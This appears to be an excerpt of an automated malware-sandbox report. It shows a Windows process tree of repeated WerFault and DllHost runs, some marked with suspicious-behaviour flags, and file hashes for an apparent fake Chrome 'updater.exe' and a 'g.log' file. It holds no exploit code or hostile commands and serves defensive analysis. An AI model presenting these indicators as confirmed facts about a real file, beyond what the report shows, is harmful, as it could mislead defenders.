C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3968 -s 4002⤵
- Checks processor information in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 3968 -ip 39682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 4072 -ip 40722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4332 -ip 43322⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 2288 -ip 22882⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4808 -ip 48082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4256 -ip 42562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3524 -ip 35242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 2100 -ip 21002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4152 -ip 41522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4952 -ip 49522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 664 -p 3848 -ip 38482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 680 -p 1152 -ip 11522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 676 -p 764 -ip 7642⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 3400 -ip 34002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 4072 -ip 40722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 2016 -ip 20162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 3128 -ip 31282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 644 -p 3048 -ip 30482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 3828 -ip 38282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 2964 -ip 29642⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4692 -ip 46922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 4492 -ip 44922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 2504 -ip 25042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 2976 -ip 29762⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 3292 -ip 32922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 2996 -ip 29962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 1228 -ip 12282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 508 -p 3196 -ip 31962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4240 -ip 42402⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 3248 -ip 32482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 2592 -ip 25922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 2740 -ip 27402⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 748 -ip 7482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 1844 -ip 18442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 4152 -ip 41522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 512 -p 4336 -ip 43362⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 3048 -ip 30482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4648 -ip 46482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 3028 -ip 30282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 1404 -ip 14042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 1200 -ip 12002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 504 -p 560 -ip 5602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 5084 -ip 50842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 3624 -ip 36242⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 3068 -ip 30682⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 576 -p 3928 -ip 39282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 3692 -ip 36922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 4788 -ip 47882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 4124 -ip 41242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 528 -ip 5282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 3036 -ip 30362⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 4824 -ip 48242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 2976 -ip 29762⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 2396 -ip 23962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 548 -p 1688 -ip 16882⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 8081⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4332 -s 4002⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2288 -s 4002⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4808 -s 4522⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4256 -s 3682⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3524 -s 6642⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2100 -s 3681⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4952 -s 7922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4152 -s 6561⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3848 -s 6642⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1152 -s 4722⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 764 -s 3682⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3400 -s 7842⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4072 -s 6802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2016 -s 7201⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3128 -s 5001⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3828 -s 7202⤵
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3048 -s 6561⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4692 -s 8042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2964 -s 6561⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4492 -s 4842⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2504 -s 7122⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3292 -s 6562⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2976 -s 4201⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2996 -s 6562⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1228 -s 7802⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3196 -s 4922⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4240 -s 4202⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3248 -s 4922⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2592 -s 7722⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2740 -s 4962⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 748 -s 6362⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1844 -s 6642⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4152 -s 4202⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4336 -s 4922⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3048 -s 7201⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3028 -s 2882⤵
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4648 -s 6601⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1404 -s 4201⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1200 -s 4682⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 560 -s 7721⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5084 -s 6642⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3624 -s 7802⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3068 -s 4442⤵
- Checks processor information in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3928 -s 7201⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3692 -s 3602⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4788 -s 4601⤵
- Checks processor information in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4124 -s 6642⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 528 -s 3722⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3036 -s 6562⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4824 -s 2282⤵
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2396 -s 7242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2976 -s 4081⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER186D.tmp.csvFilesize
35KB
MD51ead4817b3da0f47a1f671510e287f52
SHA1108b9af47b27b88f30d3a5f0ccbdbb27c4424d19
SHA2562ee321c2ea5072320cbe741e3bf86df9ebe999ed62eaa02ecf1bc63d024925f1
SHA5129da2a6852fcb1cf9949261d719e97565918f5e93cf5be45c704bc5a10f08962b6e096b0960b161f411c2efd02341837f8b5e45d9ed2886e5766ba08cf2871914
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER190A.tmp.txtFilesize
13KB
MD5aefbf435bee7e778dd185ff06e1598fc
SHA1ff8110abb913e3fc8f33f4d74d921633fc5eac47
SHA2569ad4db46d280bf9df665b85b59d7dbe3a309b8231f093a23cc982dd3ce5c8851
SHA5125fe87f579abac37e97f58735f8ca478c9f79a577dc90a98c5a23c85d473e3c08518a8cbfac2f3b367bd06f391d396accbfe8a3c2226674eb976e8056a9e9b44c
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D13.tmp.csvFilesize
35KB
MD5a782752b6a68858dd60df83207c40422
SHA198630686a0ef38e5af393b3c9cd8d137ffa76c01
SHA256ee3f46de7df50bd9edd0917dc6ee3caa812836f388e45f1566806a70cc067617
SHA512118012c300ff72e6a5a5c3fa287730e21b08c80dc87974f54ece4f675ed63bb2077dd7ee0f867e3adc1e5d2eab4a90d5b798bc21ee90891fe23db8aa8c5a9c9d
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D62.tmp.txtFilesize
13KB
MD5e65f2e0a8b84c7910824e45673708cc4
SHA1f1c83bd46008bc04729c694d55412ced5c976139
SHA256c17c905fd5c0d6983c523b9238597075364ed8fcf554966fbaf205208b142ffc
SHA512b237bfd0c9b0d021010d1ea7f5a415880a5dfec012e484d375834a7e1130b579c57295be4e4bf6bef9fbb234e12993e56034206b240ff2d0485cf215ba5b28a8
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2080.tmp.csvFilesize
35KB
MD56795052088cbded8da7d04a6083fd39c
SHA17d577d77ccee90c6d53c65c238058f03d87cf873
SHA25657af91002cdb8f02785de1c679a98c132c0350405d708d8b838ab8334004f73d
SHA512fbf3cf204fbae6c31d02e3ddc4d0fffaf46f7e7cac832ca79fc8d2e7dc444a3755feeb4f88e4426760d83e7aa8fc6a99f31aacf6ecf90271d8b98dab05ba36b8
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER20CF.tmp.txtFilesize
13KB
MD5e75c9fce4d7a5a6b65773e48738938a7
SHA1d8361b90408e92d1a08d9553d0c850db2a6886b6
SHA2561bafbe5a60d5e1dd2ae148968cf735afb8c17a135d1cfb493a26d0a7694fdb49
SHA51289d3429fe7b2c31d2eeacb00ec87a301ebc301b6043b991e7ac7ea7af766bf3b8676e263b7f31c5969bc8a879138ccca4f6961bdc96f1e91e2f4a90c6dc8a83a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2302.tmp.csvFilesize
35KB
MD5104dd3d557055dfaf384f4e378b9c61a
SHA13286f605cd80f7db61192aa3611481f27fa8b55a
SHA25634bd7f87c1fdd75f7b630563e8983f077a6b94c273d086d8cd364e31027aa072
SHA512917f5004b6c9ff1f9f4049009213ca1ea90ed908381bb037aa010ec095d3854b1d511da9823c8d6ba5c9396b054d9291c32b0262a59f9fc03cee2c50bb0487cb
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2342.tmp.txtFilesize
13KB
MD5d8de653478cfa870495d1bc62d62f346
SHA1657872e3a76f854281359ab94b40058a70c4e686
SHA256794fa989c62ebe30cfa61482c769e5bc0a7795630c712e32ed4cec3ad17dbe97
SHA5120f2f0b9747f8ad3e6f2641c3e88e588cd12afaa85110e45f519ee77fc633098592dd389029363fdc8288755e7374d1118a55582383ca1bb913bcedc3605d33b6
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER28FF.tmp.csvFilesize
35KB
MD52e322df7692ef0f445c0b46a17ddddaa
SHA1872d1c2c0b105e5606c0780ec718554c4823d6a7
SHA256d623d2de21b965e090d1fa46798167d4fe28c66b6d073fe2d5737c68b931fdbc
SHA51257fb5ba84bf423bb6f6494b52252514d901ac7a00ced061251d906acd20e363167225d57a448c1d18c40f8842a096e971515bf4e34dac1a0a34abe5667e84f38
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER293F.tmp.txtFilesize
13KB
MD5809cc9b93bf2216aef0f3499d04aee2a
SHA15f0016e94843a96c9a92953e978593c7dc7d39c2
SHA2565ca9a2eac36757af0c6a4fe02517f89c4b997049cda17eb137cff88b816cae51
SHA5121816fb38082b78ef82f71ea29077b394381c7ba6fd44fff256f9c50896f4900c57b1b82c88b30115f3d9c30db0869c05c22e6164a3e931cbf8490e8080ef08c1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D18.tmp.csvFilesize
35KB
MD51ffdee48f88859dd67f84f194b19d557
SHA1b5862a8052cdc930bb6112acc1f5e2f95b6b69c5
SHA256f13569c1f6010fe87d5d233ee77baf035021ce71c9dcf1c6d8d21b18efa012d0
SHA5126f7eb9231d2aa13779f59b91d967b8e4de1fc522b1935b7750f50c824efc6131329bc2c52506a47d3c81b2f66df2fcffdd9df7b70116d92b6d6aebbe4b8489d2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D77.tmp.txtFilesize
13KB
MD5df1459bed8c31ab0033bdfef82b4233a
SHA18bbb55034d242c9dc3f086bcea34f68bfbf9d07f
SHA256ff19de82946fc4fbeb24f3374b3c14e29824e8355d81645f02b5fe4da2ba570c
SHA512d3ecf88967b96c3705e0e1965a106efe74f51b956ec17dabb8efe8c6da000704daf4dbd4bacda55a8a1e4236a7b342cb47b2c57898ce63c69e45109cf1933f88
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER30A5.tmp.csvFilesize
35KB
MD5b8dbb8cba2d3437f614a7a59910c0ae0
SHA1b38f881aaacf4421dcdd01d639f1ee505c9800a3
SHA256c782b2820e8a7da7b1b1f71e271808b44b05c47bd177029fa19dc8cf290076b5
SHA512e1db0a97f6a0275ab776be5a182fd76f12ca899a4db43534c14d1a9b64d049017909f4d4df5e84e5f9d6d65fdebcc3a35a234362b4ce72ecc074841641fbf7d1
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER30F4.tmp.txtFilesize
13KB
MD568efc64901dc867e8bbe2a84965dfbc3
SHA139bb92088291fa19aabd00196f44165402327b06
SHA256d5809b2629e25d3d706dc98fc6d42ef84abd483760e42e6b7a63288e3e769024
SHA512cb5dbdb3f97d6d64d2957c94c0bd6665fc8a5bc3da34bec54d9d18a94646c4dd5f54c72273715b29531f4fca2ad93362f98d206307126addfc5e63ae49f3f6ce
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3942.tmp.csvFilesize
37KB
MD51498336b424e45a820be91898b79b6fe
SHA1cd69b8825bbb326b8d0a491af45ac20b28a52ca2
SHA25648f8b2301d31fb0fa710330aaa635d6f8581749423588ce09ec2c78817e40605
SHA512c3a9bbb0fd1c4c412b1cb7331bb6dcf6aa3e7dfca67b83b20c25e5617f9fd5cf508ba1dea9563ea840b7b34b5a4ec244d3c5583a8f06e3880effe6a0e97fa88f
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3962.tmp.csvFilesize
37KB
MD59c95f55f1781ef3b7fc8c1f824b5d1c7
SHA154e6477a8b1e37712e5600813491c27be429fcc0
SHA256fea314db621144b5dbca0ac41a18994e91465a3e53db33c5c7b0158e6b80abc8
SHA51281759feab8a11ea66c656f736c7ded22bae7e0a7adc5448927516ede67156ed437fcc52113d42043852ebabe31ca939318a8040954ae405c5753a6ad24507b81
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER39B1.tmp.txtFilesize
13KB
MD5f6b251e6e0832bab705794ee944aa2c3
SHA129a3079de00be961480a24e1a2a7e6f9fae1fe0c
SHA2569037ed34c7b176c0809e116cb29d77bfa3a3ea0293e02c06ba6db74cb86db3b9
